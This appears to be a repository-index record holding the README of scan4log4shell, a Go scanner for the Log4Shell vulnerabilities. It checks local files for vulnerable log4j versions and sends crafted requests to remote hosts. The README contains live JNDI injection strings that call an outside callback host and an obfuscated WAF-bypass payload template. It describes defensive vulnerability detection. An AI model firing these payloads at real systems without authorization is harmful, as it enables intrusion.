{"id":13842058,"url":"https://github.com/hupe1980/scan4log4shell","last_synced_at":"2026-03-16T08:31:46.171Z","repository":{"id":43865954,"uuid":"437756128","full_name":"hupe1980/scan4log4shell","owner":"hupe1980","description":"Scanner to send specially crafted requests and catch callbacks of systems that are impacted by log4j log4shell vulnerability and to detect vulnerable log4j versions on your local file-system","archived":false,"fork":false,"pushed_at":"2022-02-15T13:04:54.000Z","size":3385,"stargazers_count":12,"open_issues_count":1,"forks_count":3,"subscribers_count":4,"default_branch":"main","last_synced_at":"2025-04-16T01:55:21.135Z","etag":null,"topics":["auth","blue-team","cve-2021-44228","cve-2021-45046","cve-2021-45105","dns","form-detection","fuzzing","log4j","log4shell","rce","red-team","scanner","vulnerability","waf-bypass"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/hupe1980.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-12-13T06:09:04.000Z","updated_at":"2024-10-16T16:00:40.000Z","dependencies_parsed_at":"2022-09-22T11:40:44.836Z","dependency_job_id":null,"html_url":"https://github.com/hupe1980/scan4log4shell","commit_stats":null,"previous_names":[],"tags_count":46,"template":false,"template_full_name":null,"purl":"pkg:github/hupe1980/scan4log4shell","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hupe1980%2Fscan4log4shell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hupe1980%2Fscan4log4shell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hupe1980%2Fs
can4log4shell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hupe1980%2Fscan4log4shell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/hupe1980","download_url":"https://codeload.github.com/hupe1980/scan4log4shell/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hupe1980%2Fscan4log4shell/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":259855471,"owners_count":22922313,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["auth","blue-team","cve-2021-44228","cve-2021-45046","cve-2021-45105","dns","form-detection","fuzzing","log4j","log4shell","rce","red-team","scanner","vulnerability","waf-bypass"],"created_at":"2024-08-04T17:01:26.683Z","updated_at":"2026-03-16T08:31:46.137Z","avatar_url":"https://github.com/hupe1980.png","language":"Go","readme":"# scan4log4shell\n\u003e Scanner to send specially crafted requests and catch callbacks of systems that are impacted by log4j log4shell vulnerability and to detect vulnerable log4j versions on your local file-system\n\n## Features\n- [Local](#local) and [remote](#remote) scanner\n- Supports URL and CIDR scans\n- Supports DNS, LDAP \u0026 TCP callbacks for vulnerability discovery and validation\n- Fuzzing of 50 [HTTP request headers](internal/resource/header.txt) by default\n- Fuzzing of HTTP POST data parameters\n- Fuzzing of JSON data parameters\n- HTTP Form detection \u0026 fuzzing\n- Auth detection \u0026 fuzzing (Basic \u0026 Bearer)\n- [WAF Bypass 
payloads](internal/resource/bypass.txt)\n\n## Background\n[CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228) is a remote code execution (RCE) vulnerability in Apache Log4j 2. An unauthenticated, remote attacker could exploit this flaw by sending a specially crafted request to a server running a vulnerable version of log4j. The crafted request uses a Java Naming and Directory Interface (JNDI) injection via a variety of services including:\n- Lightweight Directory Access Protocol (LDAP)\n- Secure LDAP (LDAPS)\n- Remote Method Invocation (RMI)\n- Domain Name Service (DNS)\n\n:warning: There is a patch bypass on Log4J v2.15.0: [CVE-2021-45046](https://nvd.nist.gov/vuln/detail/CVE-2021-45046) \n\n:warning: Log4J v2.16 High Severity Vulnerability discovered: [CVE-2021-45105](https://nvd.nist.gov/vuln/detail/CVE-2021-45105)\n## Installing\nYou can install the pre-compiled binary in several different ways.\n\n### homebrew tap:\n```bash\nbrew tap hupe1980/scan4log4shell\nbrew install scan4log4shell\n```\n### scoop:\n```bash\nscoop bucket add scan4log4shell https://github.com/hupe1980/scan4log4shell-bucket.git\nscoop install scan4log4shell\n```\n\n### deb/rpm/apk:\n\nDownload the .deb, .rpm or .apk from the [releases page](https://github.com/hupe1980/scan4log4shell/releases) and install them with the appropriate tools.\n\n### manually:\nDownload the pre-compiled binaries from the [releases page](https://github.com/hupe1980/scan4log4shell/releases) and copy them to the desired location.\n\n## Building from source\nInstall a [Go 1.17 compiler](https://golang.org/dl).\nMost Go compilers that ship with an operating system are older than 1.17.\n\nRun the following command in the checked-out repository:\n\n```\nmake build\n```\n\n(Add the appropriate .exe extension on Windows systems, of course.)\n\n## Docker Support\n```bash\ngit clone https://github.com/hupe1980/scan4log4shell\ncd scan4log4shell\nmake docker-build\n\n# Scan the current working directory\ndocker run -it --rm -v 
$PWD:/data scan4log4shell local /data\n```\n\n## Usage \n```console\nUsage:\n  scan4log4shell [command]\n\nAvailable Commands:\n  catch       Start a standalone callback catcher\n  completion  Prints shell autocompletion scripts for scan4log4shell\n  help        Help about any command\n  local       Detect vulnerable log4j versions on your file-system\n  remote      Send specially crafted requests and catch callbacks of systems that are impacted by log4j log4shell vulnerability\n\nFlags:\n  -h, --help            help for scan4log4shell\n      --no-color        disable color output\n  -o, --output string   output logfile name\n  -v, --verbose         print detailed logging messages\n      --version         version for scan4log4shell\n\nUse \"scan4log4shell [command] --help\" for more information about a command.\n```\n\n## Catch\nStart a standalone callback catcher\n```console\nUsage:\n  scan4log4shell catch [tcp | dns | ldap] [flags]\n\nExamples:\n- Start a standalone dns catcher: scan4log4shell catch dns\n- Start a standalone ldap catcher: scan4log4shell catch ldap --caddr 127.0.0.1:4444\n- Start a standalone tcp catcher: scan4log4shell catch tcp --caddr 127.0.0.1:4444\n\nFlags:\n      --caddr string   address to catch the callbacks (eg. ip:port)\n  -h, --help           help for catch\n\nGlobal Flags:\n      --no-color        disable color output\n  -o, --output string   output logfile name\n  -v, --verbose         print detailed logging messages\n```\n\n## Local\nDetect vulnerable log4j versions on your file-system\n```console\nUsage:\n  scan4log4shell local [paths] [flags]\n\nExamples:\n- Scan /var/www: scan4log4shell local /var/www\n- Ignore zip \u0026 aar: scan4log4shell local . 
--ignore-ext .zip --ignore-ext .aar\n\nFlags:\n  -e, --exclude stringArray      path to exclude\n  -h, --help                     help for local\n      --ignore-cve-2021-45046    ignore CVE-2021-45046\n      --ignore-cve-2021-45105    ignore CVE-2021-45105\n      --ignore-ext stringArray   ignore .jar | .zip | .war | .ear | .aar\n      --ignore-v1                ignore log4j 1.x versions\n      --max-threads int          max number of concurrent threads (default 5)\n\nGlobal Flags:\n      --no-color        disable color output\n  -o, --output string   output logfile name\n  -v, --verbose         print detailed logging messages\n```\n\n### Example\n```bash\nmake run-local\n\nscanner_1  | [i] Log4Shell CVE-2021-44228 Local Vulnerability Scan\nscanner_1  | [i] Start scanning path /walk\nscanner_1  | ---------\nscanner_1  | [i] Inspecting /walk/apache-log4j-2.14.0-bin/log4j-1.2-api-2.14.0-javadoc.jar...\nscanner_1  | [i] Inspecting /walk/apache-log4j-2.14.0-bin/log4j-1.2-api-2.14.0-sources.jar...\nscanner_1  | [i] Inspecting /walk/apache-log4j-2.14.0-bin/log4j-1.2-api-2.14.0.jar...\nscanner_1  | [i] Inspecting /walk/apache-log4j-2.14.0-bin/log4j-api-2.14.0-javadoc.jar...\nscanner_1  | [i] Inspecting /walk/apache-log4j-2.14.0-bin/log4j-api-2.14.0-sources.jar...\nscanner_1  | [i] Inspecting /walk/apache-log4j-2.14.0-bin/log4j-api-2.14.0.jar...\nscanner_1  | [i] Inspecting /walk/apache-log4j-2.14.0-bin/log4j-core-2.14.0.jar...\nscanner_1  | [!] Hit: possibly CVE-2021-45046 vulnerable file identified: /walk/apache-log4j-2.14.0-bin/log4j-core-2.14.0.jar\nscanner_1  | [!] Hit: possibly CVE-2021-45105 vulnerable file identified: /walk/apache-log4j-2.14.0-bin/log4j-core-2.14.0.jar\nscanner_1  | [!] 
Hit: possibly CVE-2021-44228 vulnerable file identified: /walk/apache-log4j-2.14.0-bin/log4j-core-2.14.0.jar\nscanner_1  | [i] Inspecting /walk/apache-log4j-2.15.0-bin/log4j-api-2.15.0.jar...\nscanner_1  | [i] Inspecting /walk/apache-log4j-2.15.0-bin/log4j-core-2.15.0.jar...\nscanner_1  | [!] Hit: possibly CVE-2021-45046 vulnerable file identified: /walk/apache-log4j-2.15.0-bin/log4j-core-2.15.0.jar\nscanner_1  | [!] Hit: possibly CVE-2021-45105 vulnerable file identified: /walk/apache-log4j-2.15.0-bin/log4j-core-2.15.0.jar\nscanner_1  | [i] Inspecting /walk/apache-log4j-2.15.0-bin/log4j-spring-boot-2.15.0.jar...\nscanner_1  | [i] Inspecting /walk/apache-log4j-2.16.0-bin/log4j-api-2.16.0.jar...\nscanner_1  | [i] Inspecting /walk/apache-log4j-2.16.0-bin/log4j-core-2.16.0.jar...\nscanner_1  | [!] Hit: possibly CVE-2021-45105 vulnerable file identified: /walk/apache-log4j-2.16.0-bin/log4j-core-2.16.0.jar\nscanner_1  | [i] Inspecting /walk/jakarta-log4j-1.2.8/dist/lib/log4j-1.2.8.jar...\nscanner_1  | [!] 
Hit: log4j V1 identified: /walk/jakarta-log4j-1.2.8/dist/lib/log4j-1.2.8.jar\nscanner_1  | [i] Completed scanning\n```\n\n## Remote\nSend specially crafted requests and catch callbacks of systems that are impacted by log4j log4shell vulnerability\n```console\nUsage:\n  scan4log4shell remote [command]\n\nAvailable Commands:\n  cidr        Send specially crafted requests to a cidr\n  url         Send specially crafted requests to an url\n\nFlags:\n  -h, --help   help for remote\n\nGlobal Flags:\n      --no-color        disable color output\n  -o, --output string   output logfile name\n  -v, --verbose         print detailed logging messages\n```\n\n### Remote CIDR\nSend specially crafted requests to a cidr\n```console\nUsage:\n  scan4log4shell remote cidr [cidr] [flags]\n\nExamples:\n- Scan a complete cidr: scan4log4shell remote cidr 172.20.0.0/24\n- TCP catcher: scan4log4shell remote cidr 172.20.0.0/24 --catcher-type tcp --caddr 172.20.0.30:4444\n- Custom headers file: scan4log4shell remote cidr 172.20.0.0/24 --headers-file ./headers.txt\n- Run all tests: scan4log4shell remote cidr 172.20.0.0/24 -a\n\nFlags:\n  -a, --all                         shortcut to run all checks\n      --auth-fuzzing                add auth fuzzing\n      --basic-auth string           basic auth credentials (eg. user:pass)\n      --caddr string                address to catch the callbacks (eg. 
ip:port)\n      --catcher-type string         type of callback catcher (dns | ldap | tcp | none) (default \"dns\")\n      --check-cve-2021-45046        check for CVE-2021-45046\n      --field strings               field to use\n      --fields-file string          use custom field from file\n      --form-fuzzing                add form submits to fuzzing\n      --header strings              header to use\n      --headers-file string         use custom headers from file\n  -h, --help                        help for cidr\n      --max-threads int             max number of concurrent threads (default 150)\n      --no-redirect                 do not follow redirects\n      --no-user-agent-fuzzing       exclude user-agent header from fuzzing\n      --no-wait-timeout             wait forever for callbacks\n      --param strings               query param to use\n      --params-file string          use custom query params from file\n      --payload strings             payload to use\n      --payloads-file string        use custom payloads from file\n  -p, --port strings                port to scan (default [8080])\n      --proxy string                proxy url\n  -r, --resource string             resource in payload (default \"l4s\")\n      --schema string               schema to use for requests (default \"https\")\n      --set-field stringToString    set fix field value (key=value) (default [])\n      --set-header stringToString   set fix header value (key=value) (default [])\n      --set-param stringToString    set fix query param value (key=value) (default [])\n      --timeout duration            time limit for requests (default 3s)\n  -t, --type strings                get, post or json (default [get])\n      --waf-bypass                  extend scans with WAF bypass payload\n  -w, --wait duration               wait time to catch callbacks (default 5s)\n\nGlobal Flags:\n      --no-color        disable color output\n  -o, --output string   output logfile name\n  -v, 
--verbose         print detailed logging messages\n```\n\n### Remote url\nSend specially crafted requests to an url\n```console\nUsage:\n  scan4log4shell remote url [urls] [flags]\n\nExamples:\n- Scan a url: scan4log4shell remote url https://target.org\n- Scan multiple urls: scan4log4shell remote url https://target1.org https://target2.org\n- Scan multiple urls: cat targets.txt | scan4log4shell remote url\n- TCP catcher: scan4log4shell remote url https://target.org --catcher-type tcp --caddr 172.20.0.30:4444\n- Custom headers file: scan4log4shell remote url https://target.org --headers-file ./headers.txt\n- Scan url behind basic auth: scan4log4shell remote url https://target.org --basic-auth user:pass\n- Run all tests: scan4log4shell remote url https://target.org -a\n\nFlags:\n  -a, --all                         shortcut to run all checks\n      --auth-fuzzing                add auth fuzzing\n      --basic-auth string           basic auth credentials (eg. user:pass)\n      --caddr string                address to catch the callbacks (eg. 
ip:port)\n      --catcher-type string         type of callback catcher (dns | ldap | tcp | none) (default \"dns\")\n      --check-cve-2021-45046        check for CVE-2021-45046\n      --field strings               field to use\n      --fields-file string          use custom field from file\n      --form-fuzzing                add form submits to fuzzing\n      --header strings              header to use\n      --headers-file string         use custom headers from file\n  -h, --help                        help for url\n      --max-threads int             max number of concurrent threads (default 150)\n      --no-redirect                 do not follow redirects\n      --no-user-agent-fuzzing       exclude user-agent header from fuzzing\n      --no-wait-timeout             wait forever for callbacks\n      --param strings               query param to use\n      --params-file string          use custom query params from file\n      --payload strings             payload to use\n      --payloads-file string        use custom payloads from file\n      --proxy string                proxy url\n  -r, --resource string             resource in payload (default \"l4s\")\n      --set-field stringToString    set fix field value (key=value) (default [])\n      --set-header stringToString   set fix header value (key=value) (default [])\n      --set-param stringToString    set fix query param value (key=value) (default [])\n      --timeout duration            time limit for requests (default 3s)\n  -t, --type strings                get, post or json (default [get])\n      --waf-bypass                  extend scans with WAF bypass payload\n  -w, --wait duration               wait time to catch callbacks (default 5s)\n\nGlobal Flags:\n      --no-color        disable color output\n  -o, --output string   output logfile name\n  -v, --verbose         print detailed logging messages\n```\n### Example\n```bash\nmake run-remote\n\nscanner_1  | [i] Log4Shell Remote Vulnerability 
Scan\nscanner_1  | [i] Listening on c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh\nscanner_1  | [i] Start scanning CIDR 172.20.0.0/24\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.0:8080 [GET]\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.1:8080 [GET]\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.2:8080 [GET]\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.3:8080 [GET]\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.4:8080 [GET]\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.5:8080 [GET]\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.6:8080 [GET]\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.7:8080 [GET]\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.8:8080 [GET]\nscanner_1  | [!] 
Possibly vulnerable host identified: 172.20.0.3\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.9:8080 [GET]\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.10:8080 [GET]\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.11:8080 [GET]\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.12:8080 [GET]\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.13:8080 [GET]\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.14:8080 [GET]\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.15:8080 [GET]\nscanner_1  | [!] Possibly vulnerable host identified: 172.20.0.13\n```\n\n### Custom Payloads\nIf you specify a file with custom payloads, you can use the following placeholders for callback address and resource:\n- {{ .CADDR }}\n- {{ .Resource }}\n\nFor example: \n```\n${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//{{ .CADDR }}/{{ .Resource }}}\n```\nYou can find more examples [here](internal/resource/bypass.txt)\n\n## References\n- https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592\n- https://logging.apache.org/log4j/2.x/security.html\n- https://nvd.nist.gov/vuln/detail/CVE-2021-44228\n- https://nvd.nist.gov/vuln/detail/CVE-2021-45046\n- https://nvd.nist.gov/vuln/detail/CVE-2021-45105\n\n\n## 
License\n[MIT](LICENCE)\n","funding_links":[],"categories":["Go"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhupe1980%2Fscan4log4shell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fhupe1980%2Fscan4log4shell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhupe1980%2Fscan4log4shell/lists"}